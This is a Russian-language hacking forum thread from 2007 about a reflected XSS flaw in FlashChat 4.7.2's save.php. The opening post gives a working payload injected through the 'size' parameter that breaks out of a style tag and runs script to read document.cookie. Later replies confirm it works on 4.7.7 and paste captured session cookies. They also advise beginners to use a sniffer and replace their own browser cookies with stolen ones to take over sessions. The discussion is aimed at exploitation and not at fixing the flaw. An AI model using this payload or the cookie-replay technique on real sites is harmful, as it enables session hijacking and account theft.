PDA

Просмотр полной версии : FlashChat v 4.7.2


Goudini
02.02.2007, 01:10
Пришлось мне потеститьFlashChat v 4.7.2
Сам движок написан неплохо, все входящие символы в окно чата фильтруються.

В чате имееться скрипт, который позволяет сохранить логи. При нажатии по кнопке Save образуеться ссылка вида

save.php?id=895a28e67c9b1533b0c0786b7a0706ce&font=Arial&size=13

По переменным font и size можно догадаться что это шрифт, и его размер. Глянем сорс


<style type="text/css">
<!--
BODY {
font-family: Arial, Verdana, Arial, Helvetica, sans-serif;
font-size: 13px;
}
-->
</style>

Значения переменных не фильтруються, и можно вставить любой код, закрыв тег <style>.
Вот xss:

save.php?font=Arial&size=13px;}--></style><script>alert(document.cookie)</script><!--

Теперь иходный код примет такой вид


<style type="text/css">
<!--
BODY {
font-family: Arial, Verdana, Arial, Helvetica, sans-serif;
font-size: 13px;}--></style><script>alert(document.cookie)</script><!--
}
-->
</style>

А вот и куки =)
html комментарий после скрипта нужен чтобы убрать со страници ненужные символы которые остались в скрипте

_Nikolas_
02.02.2007, 23:08
Работает, шаришь).

Connor
03.02.2007, 00:59
Как можно прикрыть ету уязвимость?И существует ли она в других версиях чата?

track
05.02.2007, 22:49
попробовал на версии 4.7.7

wbb2_cookiehash=05774aa8eb7642934e9bd942be4ccb79;
wbb2_lastvisit=1170701252;
PHPSESSID=dc09253337597b4c7b65d61b7ad7d3f1
походу тож работает :D

jusuf
10.02.2007, 19:43
a kak panimat vot eta ? 357772|1082225=15931520|1; __utmz=125134932.1170512684.1.1.utmccn=(organic)|u tmcsr=google|utmctr=taxi+4|utmcmd=organic; __utma=125134932.1436039616.1170512684.1170512684. 1171122060.2; __utmc=125134932; __utmb=125134932
no chat nawerna ciutka perepisan

Dimon_Aka_Sexxx
13.02.2007, 00:57
+1
Ну и начерта нам наши же кукисы?)
Как это можно юзать в злостных целях ?

Linuxoid
02.03.2007, 13:54
+1
Ну и начерта нам наши же кукисы?)
Как это можно юзать в злостных целях ?
Жжош! Некогда не юзал чтоли подобные уязвимости?
Кури ЭТО. (http://forum.antichat.ru/thread20140.html) ;)

Витян
02.03.2007, 17:55
я никогда не юзал такие уязвимости....ну получил свои куки......знающие и гуру разъясните пожалуйста, что дальше.

ice1k
02.03.2007, 18:00
я никогда не юзал такие уязвимости....ну получил свои куки......знающие и гуру разъясните пожалуйста, что дальше.
Тебе же дали этот линк (http://forum.antichat.ru/thread20140.html)
дык читай... =\

Apik
08.04.2007, 10:53
Лучше один раз увидеть, чем сто раз услышать... Можно ли записать видео с использованием этой уязвимости? желательно вместе с снифером. Или подробно на словах обьяснить, как пользоваться. Раньше с Xss не работал, максимум баловался метасплоитом в сетке.

Horsekiller
09.04.2007, 05:32
Лучше один раз увидеть, чем сто раз услышать.

По моему нет принципиальных отличий от других XSS, зачем писать видео?
Посмотри про использование пассивных XSS в других движках - меняется только ссылка с javascript'ом, если для тебя главное - посмотреть, как использовать сниффер - нет разницы.

Apik
10.04.2007, 17:00
Затем что я не работал никогда с Xss, и поэтому, хоть особых отличий нету, но все таки они будут, хоть малейшие. И чтобы не сидеть и не думать, что сделал не так, хотелось бы посмотреть видео, все доступно.

NiGHt-LEshiY
08.07.2007, 21:45
У меня вопросы: Я получил куки

ASPSESSIONIDACBSSTRR=HMHBOAGBNKLJCOGDHIPEPLHJ; PHPSESSID=e8rm1868slla2epr6neld77e55; phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologini d%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3 A6%3A%22187271%22%3B%7D; phpbb2mysql_sid=0f6b9ca5120f0886135f849e4380209b

что теперь, как это расшифровать? и нужно ли это? подменить всмысле изменить сначала а потом пихнуть откуда взял - так что на что менять?

Spyder
10.07.2007, 22:51
NiGHt-LEshiY (member.php?u=29476)
меняй у себя в бразуере свои куки на те , что получил